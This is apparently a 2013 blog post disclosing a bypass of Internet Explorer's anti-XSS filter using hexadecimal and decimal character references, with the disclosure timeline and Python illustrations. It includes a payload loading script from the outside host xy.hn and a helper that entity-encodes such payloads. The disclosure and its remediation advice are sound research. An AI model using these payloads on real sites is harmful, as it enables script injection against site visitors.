R. T. Waysea's Blog

Of Trusted And Untrusted Data
Another methodology for bypassing the Cross Site Scripting filter in all versions
of Microsoft's Internet Explorer web browser.

Date Event
August 23, 2013 Initial discovery of a method to bypass the Cross Site Scripting filter in all versions of Internet Explorer.
August 24, 2013 - August 25, 2013 Development of a generic Proof-of-Concept for testing and submission to Microsoft.
August 26, 2013 Submission of the generic Proof-of-Concept with working deliberately vulnerable code examples to Microsoft.
August 27, 2013 Microsoft confirms reception of materials, and opens case 15412.
September 3, 2013 - October 3, 2013 Several emails are sent back and forth about this issue.
October 4, 2013 Microsoft makes its final decision that this method of bypassing the Cross Site Scripting filter in all versions of Internet Explorer will not be fixed.
October 4, 2013 The author (me) receives the above decision and subsequently notifies Microsoft that the method will be disclosed in two weeks' time.
October 4, 2013 Microsoft acknowledges and accepts that the disclosure will occur.
October 18, 2013 Disclosure occurs.


Author's Note
UPDATED: 2013-10-24

This is the "short" write-up. The longer version has more information, should you wish to read it.

Before going any further, this is not an "end-of-the-world" issue with Microsoft's Internet Explorer family of browsers. This is a relatively simple method to bypass the reflective anti-Cross Site Scripting filter, and developers and site owners can protect their users by remediating the Cross Site Scripting vulnerabilities that are found in their work. As one resource that is available, OWASP has released a handy "Cheat Sheet" for preventing and fixing Cross Site Scripting vulnerabilities (a DOM-based Cross Site Scripting prevention "Cheat Sheet" is also available).
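As a rough illustration of the kind of remediation those cheat sheets describe, here is a minimal Python sketch of output encoding a reflected value. The function name `render_reflected` and the sample values are hypothetical and are not taken from the provided code (which is PHP); Python's standard `html.escape` stands in for whatever output encoder the application's own language offers.

```python
import html

def render_reflected(value: str) -> str:
    """Output-encode a user-supplied value before placing it in HTML.

    html.escape rewrites &, <, > and (with quote=True) both quote
    characters, so the value can no longer open a tag or close an
    attribute.
    """
    return html.escape(value, quote=True)

# A literal injection loses its angle brackets.
literal = render_reflected("<script src=//xy.hn/a.js ></script>")

# An entity-encoded injection has its ampersands escaped, so the browser
# shows the reference as text instead of decoding it into markup.
encoded = render_reflected("&#x3c;script&#62;")

print(literal)
print(encoded)
```

With the vulnerable page encoding its output this way, it no longer matters whether the anti-XSS filter catches the request or not.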

There is an addendum to this post with an additional finding. Please continue reading this write-up, and then proceed to the addendum.



This is a rather long post, even after I edited it down from the original longer post that contains more information. Some of you may want to read through it in its entirety, others may just want the code to play with. Still others may just skim bits and try to pick out the important parts.

For those of you that just want the deliberately vulnerable code to play with, you can obtain the HTML pages and PHP code here. There is a main index.html file there that contains working injections and a short description on how to execute the injected JavaScript code (all injections work as of February 05, 2014). If at all possible, even if you fall into this group, I still encourage you to read the section titled "The Idea" for thoughts on where to go in your own research.

For those of you that plan on skimming this article, the section titled "The Story" can be mostly skipped and you won't lose much of anything. The one possible exception is the three paragraphs and the two following examples beginning with "Hexadecimal references...". If you have time, read that and then go ahead and jump to "The Idea" and continue from there. Most people that have at least a beginner's understanding of HTML and PHP can also skip over the section titled "The Code" if desired, as the methodology should be made fairly obvious by experimenting with the provided examples. Feel free, however, to circle back to that section (or any other section) for any initial questions.

Microsoft requested that I include a blurb about their reasoning as to why they decided to not fix this bypass, and per their wishes I have included it below. Please consider reading it, as well as my response to it toward the bottom of this page.


The Story

On August 23, 2013, I was performing a manual evaluation of a website for web security vulnerabilities and issues. The work was almost completed, and it was already past the time most people had left the office. I was performing my usual due diligence, and browsing the website in the various web browsers that I have at my disposal to see if any browser-specific functionality would be found.

Earlier in the day I had found a mildly interesting Cross Site Scripting ("XSS") vulnerability on the site. An injection would land in the attribute space of an iframe definition, and the page that was specified in the definition was vulnerable to a reflected XSS injection. So a victim would be induced to click on a link (or submit a form), the injection would land in the primary page (where it would not execute), and that primary page would make a call to the vulnerable secondary page. As the vulnerable page rendered in the victim's web browser, the script would then execute.

Again, it was a mildly interesting occurrence, but nothing to get overly excited about.

I do admit that at the time I was playing with the functionality a bit and seeing how clever I could be with various encodings that would look strange, and possibly pass the 'does it look like an obvious injection?' test, but still be rendered in the browser as I (the "attacker") would want it to be rendered.

Author's note: For some time now it has been known that Internet Explorer does not subject HTTP header data to the anti-XSS filter, and injections from cookie values or the 'Referer' value would pass through without validation. I was not testing XSS injections on these places as they were not being reflected in responses.

Back to the story in a bit, but first, some background: 

Hexadecimal references to characters appear to have first been included in the HTML standard in the HTML 4.0 specification from April of 1998, in section 3.2.3: Character references. The previous standard recommendation, HTML 3.2, has a list of allowed decimal encoded entities ("Character Entities for ISO Latin-1"), but not hexadecimal entities. The subsequent HTML 4.01 standard and the still-in-the-works HTML 5 both continue to support hexadecimal entities, in section 5.3.1 of HTML 4.01 and section 8.1.4 of the current revision of HTML 5.

Decimal encoded entities have a slightly longer history. The first mention of decimal entities in the official HTML standards goes all the way back to the first official HTML standard, HTML 2.0, under "ISO Latin 1 Character Entity Set" in 1995. As with hexadecimal entities, the latest revisions continue to support such references under the same sections noted above: 5.3.1 of HTML 4.01 and 8.1.4 of the current revision of HTML 5.

When post-1998 web browsers see correctly encoded hexadecimal references to characters, and post-1995 web browsers see correctly encoded decimal references to characters, those encodings are automatically decoded and rendered based on where in the resulting document the reference is located. The method of encoding characters as hexadecimal references may be referred to as "HTML Entity Encoding", but I'll be using the word 'hexadecimal' throughout this post.
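To make the two encodings concrete, here is a small Python sketch that decodes both forms with the standard library's `html.unescape`, which resolves numeric character references much as an HTML parser does for text and attribute values. The three-character sample string is just an illustration.

```python
import html

# The same three characters written literally, as hexadecimal
# references, and as decimal references.
literal = "<a>"
hex_refs = "&#x3c;&#x61;&#x3e;"
dec_refs = "&#60;&#97;&#62;"

def decode_references(text: str) -> str:
    """Resolve hexadecimal and decimal character references."""
    return html.unescape(text)

print(decode_references(hex_refs) == literal)
print(decode_references(dec_refs) == literal)
```

Both forms decode to the same text, which is why a browser treats them interchangeably once the page is parsed.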

As an example, this sentence is composed entirely of hexadecimal entity characters. This sentence, however, consists of decimal entity characters.

And as another example, the text inside is also hexadecimal encoded, while the url in this link is decimal encoded (go ahead, check the HTML source of this page).

This ability to use hexadecimal encoding for injection testing is fairly well known, and the anti-XSS filter in Internet Explorer does a reasonably good job of filtering out obvious injections, so I was not expecting anything to happen when I began mixing encodings into the injections I was using in Internet Explorer 10.

And then I saw the JavaScript alert(1) pop-up appear.

Naturally, my first thought was that I had some non-obvious setting disabled, so I went back and made sure everything was set to the defaults and submitted the injection again, and got the same alert(1) pop-up. At this point, to be sure that I wasn't overlooking something and making a stupid mistake, I restarted my testing virtual machine, then I restarted my computer. And the same JavaScript alert(1) pop-up appeared again and again.

So, what was happening?

I was using an injection containing hexadecimal encoded characters that was reflected back in the resulting HTML source. Then a secondary request was made to the same domain in which the hexadecimal encoded characters were automatically decoded and sent with the request. The anti-XSS filter in Internet Explorer saw the first request, didn't parse the injection as being "harmful," and subsequently didn't bother to check the resulting secondary request made with the now decoded and obviously "harmful" injection. Injections like <script src=something ></script> should always be caught by an anti-XSS filter.
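The gap between what the filter inspects and what the browser later sends can be sketched in a few lines of Python. This is a toy model only: the regular expression is a hypothetical stand-in for "looks like an obvious injection", and nothing here reflects how Internet Explorer's filter is actually implemented.

```python
import html
import re

# Hypothetical stand-in for an "obvious injection" rule. The real
# filter's rules are not described in this post.
OBVIOUS_INJECTION = re.compile(r"<\s*script\b", re.IGNORECASE)

def looks_harmful(request_value: str) -> bool:
    """Check a request value as-is, without decoding character references."""
    return bool(OBVIOUS_INJECTION.search(request_value))

# What arrives in the first request: the angle brackets are written as
# hexadecimal and decimal references.
first_request_value = "&#x3c;script src=//xy.hn/a.js &#62;&#x3c;/script&#62;"

# What the browser sends in the secondary request after decoding the
# references it found in the reflected markup.
second_request_value = html.unescape(first_request_value)

print(looks_harmful(first_request_value))   # the encoded form is not matched
print(looks_harmful(second_request_value))  # the decoded form would be matched
```

The second value is exactly the kind of string a filter should catch, but in the behaviour described above it was never checked.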

I spent the weekend building some deliberately vulnerable code that demonstrated this bypass, testing it against all versions of Internet Explorer that have the anti-XSS filter (version 8 and up), downloading the test release of Internet Explorer 11 (the "Developer Preview" edition) and testing the bypass against that, and figuring out how to properly disclose this to Microsoft.

I submitted a description of what was happening and the deliberately vulnerable Proof-of-Concept code to Microsoft, and Microsoft opened case 15412 to track this issue. A little over a month later, after several emails going back and forth between us, Microsoft informed me that they would not be releasing a fix for this bypass of their anti-XSS filter. I informed them that I would be disclosing this method in two weeks' time (October 18, 2013). Microsoft acknowledged and accepted this, and so, as scheduled, I have released this write-up along with deliberately vulnerable code to test and explore with.


The Idea

So, again, we have the question: what is happening?

The title of this blog post, Of Trusted And Untrusted Data, alludes to what I believe is happening with Internet Explorer's anti-XSS filter, why the method of injecting currently works, and avenues for web security researchers to investigate in finding other ways to bypass the anti-XSS filter.

From testing, it appears that the anti-XSS filter in Internet Explorer divides received data into two different categories:

The "Untrusted Data" consists of items that appear in the initial request, from URL and POST body parameters and values to the URL itself at times.

The "Trusted Data" consists of almost everything else that appears in the HTTP response body.

What appears to be happening with these injections is that the injections start off as "Untrusted Data" and are screened by the anti-XSS filter. When Internet Explorer's anti-XSS filter fails to see the injections as potentially harmful, they are then included in the response body without any attempt to further output-encode them. At this point the "Untrusted Data" then becomes "Trusted Data" and is not subject to further screening. When subsequent requests are made using this now "Trusted Data", Internet Explorer makes the decision to not subject the injected data to the anti-XSS filter.

What this means, for web security researchers, is that if the injection looks benign in the initial request, it can be as malicious as desired in any subsequent requests, and it will not be filtered out.
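The two-category behaviour described above can be modelled as a short Python sketch. Everything in it is an assumption made for illustration: the `Request` class, the `from_response_body` flag, and the regular expression are hypothetical names that mirror the observed behaviour, not Internet Explorer's internals.

```python
import html
import re
from dataclasses import dataclass

# Hypothetical "obvious injection" rule, for illustration only.
OBVIOUS = re.compile(r"<\s*script\b", re.IGNORECASE)

@dataclass
class Request:
    value: str
    # True when the browser built this request from content that was
    # already in a response body (a form field, an iframe src, a link).
    from_response_body: bool

def is_screened(req: Request) -> bool:
    """Model: only data from the initial request is 'Untrusted Data'."""
    return not req.from_response_body

def is_blocked(req: Request) -> bool:
    """Model: a request is blocked only if it is screened and matches."""
    return is_screened(req) and bool(OBVIOUS.search(req.value))

encoded = "&#x3c;script src=//xy.hn/a.js &#62;&#x3c;/script&#62;"
decoded = html.unescape(encoded)

initial = Request(encoded, from_response_body=False)   # screened, looks benign
followup = Request(decoded, from_response_body=True)   # malicious, never screened
direct = Request(decoded, from_response_body=False)    # control: sent directly

for name, req in [("initial", initial), ("followup", followup), ("direct", direct)]:
    print(name, "blocked" if is_blocked(req) else "allowed")
```

In this model only the control case is blocked, which matches what the Proof-of-Concepts show: the same decoded string is stopped when sent directly and passed when it arrives by way of the page.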


The Code

First, go grab the code. It can be run on any web server that can parse PHP files.

I've included three deliberately vulnerable PHP-based Proof-of-Concepts in the provided code, and I'll briefly go over them here.

The first Proof-of-Concept is a slightly modified version of the example I submitted to Microsoft. I believe it demonstrates just what is happening the most clearly, as everything is broken up into the component parts.

In the first Proof-of-Concept, the injection lands in the attribute space of a form input tag. The form is then submitted to a vulnerable page where the value of the 'xss' parameter is reflected directly. The example I submitted to Microsoft had the form being automatically submitted, but otherwise the code is almost identical.

When observing the input field from the browser window, it will be very obvious that the injection is one that should be caught. Viewing the source of the page, however, reveals that a few of the letters that make up the injection have been replaced with their hexadecimal or decimal encoded equivalents. The browser sees these encoded characters and properly decodes them per the official HTML standard. The anti-XSS filter does not decode the injection, and subsequently does not see the injection as potentially harmful. When the user then submits the form to the vulnerable page, the browser automatically decodes the hexadecimal or decimal encoded characters and submits the parameter value as 'regular' text (with special characters URL-encoded).
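For experimenting with your own variations, here is a Python sketch of a helper that replaces a chosen set of characters with alternating hexadecimal and decimal references. The helper name `entity_encode` and the default character set are hypothetical; the injections shipped with the provided code were not necessarily built this way.

```python
import html

def entity_encode(text: str, targets: str = "<>st") -> str:
    """Replace each character in `targets` with a character reference,
    alternating between hexadecimal and decimal forms."""
    out = []
    use_hex = True
    for ch in text:
        if ch in targets:
            out.append(f"&#x{ord(ch):x};" if use_hex else f"&#{ord(ch)};")
            use_hex = not use_hex
        else:
            out.append(ch)
    return "".join(out)

payload = "<script src=//xy.hn/a.js ></script>"
encoded = entity_encode(payload)

print(encoded)                             # what appears in the page source
print(html.unescape(encoded) == payload)   # what the browser reconstructs
```

The encoded string contains no literal angle brackets, yet it decodes back to the original payload, which is the property the first Proof-of-Concept relies on.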

This second request comes from data that passed the initial screening of the anti-XSS filter and is "Trusted Data" that is not subject to additional screening. And so even though the injection appears in the request as the obviously potentially malicious %3Cscript+src%3D%2F%2Fxy.hn%2Fa.js+%3E%3C%2Fscript%3E, the anti-XSS filter in Internet Explorer completely ignores it.
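The URL-encoded value quoted above can be reproduced with Python's standard `urllib.parse.quote_plus`, which applies the same form encoding (spaces become `+`, reserved characters become `%XX`). The decoded payload string below is inferred from that encoded value.

```python
from urllib.parse import quote_plus, unquote_plus

# The decoded injection, as the browser holds it after resolving the
# character references in the form field.
decoded_injection = "<script src=//xy.hn/a.js ></script>"

# Form-encode it the way it would appear as a parameter value.
submitted = quote_plus(decoded_injection)
print(submitted)

# Round-trip check: the server-side decode recovers the injection.
print(unquote_plus(submitted) == decoded_injection)
```

The encoded value contains a plainly readable `script` tag, so nothing about the request itself is hidden from a filter that chooses to look.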

The second Proof-of-Concept is based on my initial finding where the injection lands in an iframe definition and is subsequently reflected in the page specified in the iframe definition. This example is slightly less clear than the first, as the injection is not broken out into its own <input... field. The injection is still landing in attribute space, and is still not being filtered as potentially malicious by the anti-XSS filter. Once it lands, it is then treated as "Trusted Data" and thus when the iframe makes the call for the vulnerable page, the injection is again ignored.

Unlike the first Proof-of-Concept, no user interaction is required for the injected JavaScript to execute. The first Proof-of-Concept requires that the user submit the form, and was designed to give the user more control over that occurrence. When the iframe definition is rendered in the user's browser, the secondary request is automatically made to the vulnerable page without the user needing to tell the browser to make that request.

The third Proof-of-Concept does not use any form or frame/iframe functionality. Rather it is a single page where an injection is directly reflected in the visible text space of the page. As a minor challenge, I included a message informing the user to be wary of the type of injection that will be used.

For this Proof-of-Concept, the injection is a <div> tag with an ordinary <a href="..."> tag containing a link back to the same page, but this time with the XSS injection fully decoded. As with the previous two Proof-of-Concepts, the injection lands in attribute space, is properly decoded by the browser, but is not decoded by the anti-XSS filter. The injection is subsequently declared to be "Trusted Data" and is then ignored by the anti-XSS filter on future requests. The only difference is that the initial injection creates its own attribute space to 'hide' the XSS injection, whereas the previous two Proof-of-Concepts utilized attribute spaces that were already provided.


The Decision from Microsoft

When I informed Microsoft that I was going to disclose this methodology for bypassing the anti-XSS filter in all versions of Internet Explorer, Microsoft acknowledged and accepted that it would occur. Microsoft did request that I include a link to their design philosophy blog post in this write up, which can be found at:


Specifically, Microsoft referenced category 3 on the above page in which it discusses "application-specific transformations," and in particular the possibility of an application that would "ROT13 decode" values before reflecting them.

The "ROT13 decode" and "application-specific transformations" mentions do not apply. As noted above, hexadecimal and decimal encodings have been part of the official HTML standard since 1998 and 1995, respectively. There is no "only appears in this one type of application" functionality being used. The XSS injection lands in attribute space and is then relayed to a vulnerable page (either another page, or back to itself) where it executes.

Beyond that, the ability to use hexadecimal and/or decimal encodings to bypass the anti-XSS filter in Internet Explorer is not the flaw, but rather two implementations of Proof-of-Concept exploits that make use of the flaw to achieve a bypass. The flaw, instead, is that injected "Untrusted Data" can be turned into "Trusted Data" and that injected "Trusted Data" is not subject to validation by the anti-XSS filter.

The sub-title for this post begins with "Another methodology...", as that is just what this is. The finding is not one or two specific encodings that can be used, but a method that security researchers can add to their toolkit and use as part of their professional work:

That is the flaw. Rather than processing and filtering all requests from the user, only a subset of requests is validated. And for those requests, the anti-XSS filter only looks for immediate code execution. The ability to use standard HTML encodings is just an implementation utilizing that flaw.


The End?

Well, that's where things are as of Friday, October 18, 2013.

The code is available for you to test out on your own, and The Idea should give you a place to start your own research into other potential methods.

At this time there's not much more for me to say.

Thank you for reading.

  R. T. Waysea

        By Way of the Sea

Have a comment on this? Think I got something wrong? Let me know.

© 2015 - R.T.Waysea
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 United States License.

All trademarks are property of their respective owners.

If you are foolish enough to believe that anything here represents the thoughts/views/opinions/etc. of any employer of mine (past, present, or future), please don't embarrass yourself by advertising that fact.
